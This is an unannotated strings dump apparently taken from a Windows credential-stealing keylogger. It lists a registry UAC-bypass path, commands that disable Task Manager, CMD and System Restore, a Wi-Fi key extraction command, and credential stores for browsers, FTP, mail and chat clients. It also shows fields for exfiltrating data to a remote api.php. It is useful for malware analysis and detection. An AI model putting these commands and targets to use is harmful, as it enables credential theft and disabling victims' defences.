- Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- SOFTWARE\Classes\mscfile\shell\open\command
- eventvwr.exe
- SOFTWARE\Classes\mscfile
- Windows 7
- Windows 8
- Windows 10
- 0
- %startupfolder%
- \%insfolder%\
- SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
- Shutdown -r -t 5
- True
- Player
- temp
- \
- .exe
- Johnson
- Miller
- michael
- Abby
- Emily
- John
- Length
- root\CIMV2
- type={0}
- hwid={1}
- time={2}
- pcname={3}
- logdata={4}
- screen={5}
- ipadd={6}
- webcam_link={7}
- client={8}
- link={9}
- username={10}
- password={11}
- screen_link={12}
- site_username={13}
- webcam
- /
- Webcam Capture From:
- https://api.imgur.com/3/upload.xml
- \ScreenShot
- \ScreenShot\screen.jpeg
- screenshots
- Screen Capture From:
- Screenshot_
- /log.tmp
- keylog
- [SavedLog (
- [Saved Log]
- Keystrokes From:
- <html><span style=font-family:Courier New;font-size:14px;font-style:normal;font-weight:bold;text-decoration:none;text-transform:none;color:#000000;>Local Time :
- </span></html>
- Keystrokes_
- update
- info
- uninstall
- type={0}
- hwid={1}
- time={2}
- pcname={3}
- logdata={4}
- screen={5}
- ipadd={6}
- webcam_link={7}
- screen_link={8}
- site_username={9}
- [passwords]
- passwords
- Count
- HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\
- Host
- REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
- DisableCMD
- REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
- DisableSR
- REG add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
- E+MTWs/(En()a3456d3h99sdf9sjdgA&%/+vkm&FGNBDSFs5(TRS%cxv
- p=
- %PostURL%/api.php
- application/x-www-form-urlencoded
- http://checkip.dyndns.org/
- <font color=#008000>{BACK}</font>
- </font>
- <font color=#008000>{ALT+F4}</font>
- <font color=#008000>{ESC}</font>
- <font color=#008000>{CAPSLOCK}</font>
- <font color=#008000>↓</font>
- <font color=#008000>→</font>
- <font color=#008000>{END}</font>
- <font color=#008000>{Insert}</font>
- <font color=#008000>{PageDown}</font>
- <font color=#008000>{ENTER}</font>
- <font color=#008000>{F1}</font>
- <font color=#008000>{F2}</font>
- <font color=#008000>{F3}</font>
- <font color=#008000>{F4}</font>
- <font color=#008000>{F5}</font>
- <font color=#008000>{F6}</font>
- <font color=#008000>{F7}</font>
- <font color=#008000>{F8}</font>
- <font color=#008000>{F9}</font>
- <font color=#008000>{F11}</font>
- <font color=#008000>{CTRL}</font>
- .lnk
- WScript.Shell
- CreateShortcut
- TargetPath
- cmd.exe
- WorkingDirectory
- Arguments
- /c start
- " "
- &start
- & exit
- IconLocation
- Save
- .lnk
- &explorer /root,"%CD%
- " & exit
- Opera Software\Opera Stable\Login Data
- Opera
- encryptedUsername)":"(.*?)"
- Firefox
- IELibrary
- IELibrary.InternetExplorer
- GetSavedPasswords
- URL
- UserName
- Password
- Browser
- \Apple Computer\Preferences\keychain.plist
- seamonkey
- SeaMonkey
- MapleStudio\ChromePlus\User Data\Default\Login Data
- CoolNovo
- Torch\User Data\Default\Login Data
- Torch Browser
- UCBrowser\
- *
- Login Data
- journal
- UC Browser
- wow_logins
- All User Profile * : (?<profile>.*)
- profile
- Wi-Fi
- wlan show profile name="
- " key=clear
- Key Content * : (?<password>.*)
- password
- No Password!
- ALLUSERSPROFILE
- \\
- DynDNS\Updater\config.dyndns
- username=
- =
- password=
- &H
- t6KzXhCh
- http://DynDns.com
- DynDNS
- \FileZilla\recentservers.xml
- <Server>
- <Host>
- </Host>
- :
- <Port>
- </Port>
- <User>
- </User>
- <Pass encoding="base64">
- </Pass>
- <Pass>
- FileZilla
- \jDownloader\config\database.script
- programfiles(x86)
- HKEY_CURRENT_USER\Software\Paltalk\
- pwd
- http://Paltalk.com
- Paltalk
- \.purple\accounts.xml
- <account>
- <protocol>
- </protocol>
- <name>
- </name>
- <password>
- </password>
- Pidgin
- SmartFTPClient 2.0FavoritesQuick Connect*.xml
- <Password>
- </Password>
- <Name>
- </Name>
- SmartFTP
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander\UninstallString
- uninstall.exe
- Ftplist.txt
- ;Server=
- ;Port=
- ;Password=
- ;User=
- ;Anonymous=
- Name=
- FTPCommander
- HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC
- USERname
- http://no-ip.com
- NO-IP
- +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
- Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
- HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
- Executable
- \VirtualStore\Program Files\Foxmail\mail\
- ';:,<>/?+=
- \Pocomail\accounts.ini
- POPPass
- SMTPPass
- SMTP
- PocoMail
- No data!
- [
- ]
- ;
- <array>
- <dict>
- <string>
- </string>
- <data>
- </data>
- Safari Browser
- -convert xml1 -s -o "
- \fixed_keychain.xml"
- A
- 10
- B
- 11
- C
- 12
- D
- 13
- E
- 14
- F
- 15
- ABCDEF
- PK11_GetInternalKeySlot
- PK11_FreeSlot
- ATOB_ConvertAsciiToItem_Util
- ATOB_ConvertAsciiToItem
- PK11SDR_Decrypt
- NSS_Shutdown
- PK11_Authenticate
- PROGRAMFILES(x86)
- \Mozilla Firefox\nss3.dll
- \Mozilla Firefox\
- PROGRAMFILES
- \Postbox\nss3.dll
- \Postbox\
- \Mozilla Thunderbird\nss3.dll
- \Mozilla Thunderbird\
- \SeaMonkey\nss3.dll
- \SeaMonkey\
- \Flock\nss3.dll
- \Flock\
- \vcruntime140.dll
- mozglue.dll
- nss3.dll
- NSS_Init
- Password could not decrypted.
- Copy
- An error occurred!
- \Mozilla\Firefox\
- Path=([A-z0-9\/\.]+)
- profiles.ini
- \Mozilla\SeaMonkey\
- \Flock\Browser\
- \Thunderbird\
- (
- IndexOf
- UNIQUE
- table
- No Data
- RegRead